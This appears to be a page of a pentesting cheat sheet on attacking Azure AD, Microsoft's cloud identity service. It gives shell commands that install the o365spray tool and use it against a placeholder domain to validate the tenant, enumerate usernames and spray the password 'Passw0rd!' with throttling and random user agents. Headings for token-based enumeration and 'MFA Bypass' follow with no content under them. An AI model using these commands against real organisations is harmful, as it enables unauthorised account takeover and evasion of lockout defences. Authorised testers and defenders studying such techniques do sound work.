Azure AD
OSINT
OpenID configuration:
$ curl -s https://login.microsoftonline.com/<TENANT_ID>/v2.0/.well-known/openid-configuration | jqPassword Spray
Using o365spray (random user agents here):
$ pipx install -f "git+https://github.com/0xZDH/o365spray.git"
$ o365spray --validate -d megacorp.cloud
$ o365spray --enum -d megacorp.cloud -u snovvcrash
$ o365spray --enum -d megacorp.cloud -U names.txt
$ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --rate 1 --useragents ua.txtEnumeration
Tools
ROADrecon
AzureHound
Get the device_code:
Get the refresh_token:
Collect data providing the refresh_token:
MFA Bypass
Check if MFA is forcefully enabled via well-known client GUIDs:
AAD.BrokerPlugin
Last updated